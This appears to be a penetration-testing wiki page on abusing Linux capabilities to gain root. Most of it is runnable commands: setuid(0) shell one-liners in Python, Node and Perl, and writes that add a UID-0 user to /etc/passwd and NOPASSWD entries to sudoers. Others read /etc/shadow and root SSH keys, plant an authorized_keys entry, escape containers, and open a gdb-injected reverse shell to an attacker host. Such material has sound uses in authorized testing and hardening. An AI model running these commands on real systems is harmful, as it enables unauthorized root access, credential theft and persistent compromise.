Capabilities abuse
Understanding Linux Capabilities
What Makes Capabilities Dangerous
Linux capabilities provide fine-grained control over privileged operations, allowing specific elevated permissions without full root access. However, certain capabilities can be abused to gain complete root privileges, making them attractive targets for privilege escalation.
The Attack Principle: Exploit capabilities that:
Allow privilege escalation through file operations (CAP_CHOWN, CAP_FOWNER)
Enable arbitrary code execution with elevated privileges (CAP_SETUID, CAP_SETGID)
Permit bypassing file system restrictions (CAP_DAC_OVERRIDE, CAP_DAC_READ_SEARCH)
Allow system administration functions (CAP_SYS_ADMIN, CAP_SYS_PTRACE)
Why This Works: Capabilities run with specific elevated privileges. If you can control a binary with dangerous capabilities, you can perform privileged operations that lead to full root access.
Capabilities Discovery and Enumeration
Finding Capabilities on Files
Basic Capability Discovery:
# Find all files with capabilities set
getcap -r / 2>/dev/null
# Find capabilities in common directories
getcap -r /usr/bin /usr/sbin /bin /sbin 2>/dev/null
# Find capabilities in user directories
getcap -r /home /tmp /var/tmp 2>/dev/null
# Check specific binary for capabilities
getcap /path/to/binaryProcess Capability Analysis:
# Check current process capabilities
cat /proc/self/status | grep Cap
capsh --print
# Check capabilities of specific process
cat /proc/PID/status | grep Cap
# Decode capability hex values
capsh --decode=0000003fffffffffDangerous Capabilities to Look For:
# Search for the most dangerous capabilities
getcap -r / 2>/dev/null | grep -E "(cap_setuid|cap_setgid|cap_dac_override|cap_fowner|cap_chown|cap_sys_admin)"
# Check for specific high-value capabilities
getcap -r / 2>/dev/null | grep -E "(setuid|setgid|dac_override|sys_admin|sys_ptrace)"High-Value Capability Exploits
CAP_SETUID - Direct Root Access
Why CAP_SETUID is Critical: Allows changing user ID to any user, including root (UID 0).
Python with CAP_SETUID:
# If python has cap_setuid
getcap /usr/bin/python3
# Should show: /usr/bin/python3 = cap_setuid+ep
# Exploit to gain root
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"Custom Binary with CAP_SETUID:
# If you find any binary with cap_setuid, check if it's exploitable
# Many interpreters and utilities with this capability can spawn root shells
# For binaries that accept scripts or commands
/path/to/binary_with_setuid -c "import os; os.setuid(0); os.system('/bin/bash')"CAP_SETGID - Group-Based Escalation
Exploiting CAP_SETGID:
# Change to privileged groups (shadow, disk, etc.)
python3 -c "import os; os.setgid(0); os.system('/bin/bash')"
# Or target specific powerful groups
python3 -c "import os; os.setgid(42); os.system('/bin/bash')" # shadow group
python3 -c "import os; os.setgid(6); os.system('/bin/bash')" # disk groupCAP_DAC_OVERRIDE - File System Bypass
Why CAP_DAC_OVERRIDE is Powerful: Bypasses all file read, write, and execute permission checks.
File System Exploitation:
# If binary has cap_dac_override, it can read/write any file
# Check for interpreters with this capability
# Read sensitive files
python3 -c "print(open('/etc/shadow').read())"
python3 -c "print(open('/root/.ssh/id_rsa').read())"
# Write to system files
python3 -c "open('/etc/passwd', 'a').write('hacker:x:0:0:root:/root:/bin/bash\n')"
# Modify sudoers file
python3 -c "open('/etc/sudoers', 'a').write('$USER ALL=(ALL) NOPASSWD:ALL\n')"CAP_FOWNER - File Ownership Manipulation
Exploiting CAP_FOWNER:
# Change ownership of system files
python3 -c "import os; os.chown('/etc/passwd', 1000, 1000)"
python3 -c "import os; os.chown('/etc/shadow', 1000, 1000)"
# Change permissions after taking ownership
python3 -c "import os; os.chown('/bin/bash', 1000, 1000); os.chmod('/bin/bash', 0o4755)"CAP_CHOWN - Ownership Changes
Taking Control of System Files:
# Change ownership of critical files to current user
python3 -c "import os; os.chown('/etc/sudoers', os.getuid(), os.getgid())"
# Then modify the file
echo "$USER ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoersCAP_SYS_ADMIN - System Administration Access
Why CAP_SYS_ADMIN is Dangerous: Provides numerous system administration capabilities including mount operations.
Mount-Based Escalation:
# If binary has cap_sys_admin, it can perform mount operations
# Create container-style escalation
# Mount /etc from host (if in container)
python3 -c "import os; os.system('mount -t proc proc /proc')"
# Access host filesystem through /proc/1/root
python3 -c "import os; os.chroot('/proc/1/root'); os.system('/bin/bash')"Interpreter-Specific Exploits
Python Capabilities
Common Python Capability Exploits:
# CAP_SETUID exploitation
python3 -c "import os; os.setuid(0); os.execl('/bin/bash', 'bash')"
# CAP_DAC_OVERRIDE for file access
python3 -c "
import os
# Read any file
with open('/etc/shadow') as f: print(f.read())
# Write to any file
with open('/etc/passwd', 'a') as f: f.write('hacker:x:0:0::/root:/bin/bash\n')
"
# CAP_SYS_ADMIN for mount operations
python3 -c "
import os, subprocess
subprocess.call(['mount', '-t', 'tmpfs', 'tmpfs', '/mnt'])
os.chroot('/mnt')
os.system('/bin/bash')
"Node.js Capabilities
Node.js Capability Exploitation:
# If node has dangerous capabilities
node -e "process.setuid(0); require('child_process').spawn('/bin/bash', {stdio: [0, 1, 2]})"
# File operations with CAP_DAC_OVERRIDE
node -e "
const fs = require('fs');
fs.appendFileSync('/etc/passwd', 'hacker:x:0:0::/root:/bin/bash\n');
"Perl Capabilities
Perl Capability Exploitation:
# CAP_SETUID with Perl
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash"'
# File manipulation
perl -e 'open(F, ">>/etc/passwd"); print F "hacker:x:0:0::/root:/bin/bash\n"; close(F);'Binary-Specific Capability Abuse
tar with Capabilities
tar + CAP_DAC_OVERRIDE:
# Create archive of sensitive files
tar -czf /tmp/sensitive.tar.gz /etc/shadow /root/.ssh/
# Extract with different ownership (if combined with CAP_CHOWN)
tar -xzf archive.tar.gz --same-ownergdb with CAP_SYS_PTRACE
Process Debugging Escalation:
# If gdb has cap_sys_ptrace, attach to root processes
gdb -p $(pgrep -u root | head -1)
# Within gdb, execute system commands
(gdb) call system("/bin/bash")
(gdb) call execl("/bin/bash", "bash", (char *)0)Capability-Based File Operations
Reading Sensitive Files
High-Value Target Files:
# With CAP_DAC_OVERRIDE or CAP_DAC_READ_SEARCH
python3 -c "
import os
targets = ['/etc/shadow', '/root/.ssh/id_rsa', '/etc/sudoers', '/root/.bash_history']
for target in targets:
try:
with open(target) as f:
print(f'=== {target} ===')
print(f.read())
except:
pass
"Writing Critical System Files
System File Modification:
# Add root user to passwd
python3 -c "open('/etc/passwd', 'a').write('hacker:\$6\$salt\$hash:0:0:root:/root:/bin/bash\n')"
# Modify sudoers
python3 -c "open('/etc/sudoers', 'a').write('$USER ALL=(ALL) NOPASSWD:ALL\n')"
# Add SSH key to root
python3 -c "
import os
os.makedirs('/root/.ssh', exist_ok=True)
open('/root/.ssh/authorized_keys', 'a').write('ssh-rsa YOUR_KEY_HERE\n')
os.chmod('/root/.ssh/authorized_keys', 0o600)
"Container Escape via Capabilities
Container Capability Abuse
CAP_SYS_ADMIN Container Escape:
# If container has CAP_SYS_ADMIN
# Mount host filesystem
mkdir /tmp/host
mount /dev/sda1 /tmp/host
chroot /tmp/host bash
# Alternative: Access through /proc
ls /proc/1/root/
chroot /proc/1/root bashCAP_SYS_PTRACE Container Escape:
# Attach to process on host
gdb -p 1
(gdb) call system("bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'")Capability Exploitation Strategies
Prioritizing Capability Targets
High-Priority Capabilities (Immediate Root):
CAP_SETUID - Direct root access
CAP_SYS_ADMIN - System-level control
CAP_DAC_OVERRIDE - Bypass all file permissions
Medium-Priority Capabilities (File-Based Escalation): 4. CAP_FOWNER - Change file ownership 5. CAP_CHOWN - Change file ownership 6. CAP_SETGID - Group-based escalation
Exploitation Strategy:
# 1. Find capabilities
getcap -r / 2>/dev/null > /tmp/caps.txt
# 2. Check for high-priority capabilities first
grep -E "(setuid|sys_admin|dac_override)" /tmp/caps.txt
# 3. Test exploitation based on binary type
# - Interpreters (python, node, perl): Direct code execution
# - System tools (tar, gdb): Tool-specific abuse
# - Custom binaries: Research specific functionalityKey Operational Considerations
Success Indicators
Capability presence confirmed on exploitable binaries
Code execution achieved with elevated capabilities
File system access to previously restricted files
Process privilege escalation confirmed with
id
Common Failure Points
No dangerous capabilities found on accessible binaries
Capabilities present but binary doesn't accept arbitrary input
Modern protections (seccomp, AppArmor) prevent capability abuse
Container restrictions limit capability effectiveness
Exploitation Notes
Interpreters are gold - Python, Node.js, Perl with capabilities are easily exploitable
CAP_SETUID is king - Direct path to root if found
Container environments often have relaxed capability restrictions
Custom binaries may have capabilities but limited exploitation options
Capability abuse represents a powerful but often overlooked privilege escalation vector, particularly valuable in containerized environments where traditional SUID binaries may be restricted but capabilities are still present.
Last updated
Was this helpful?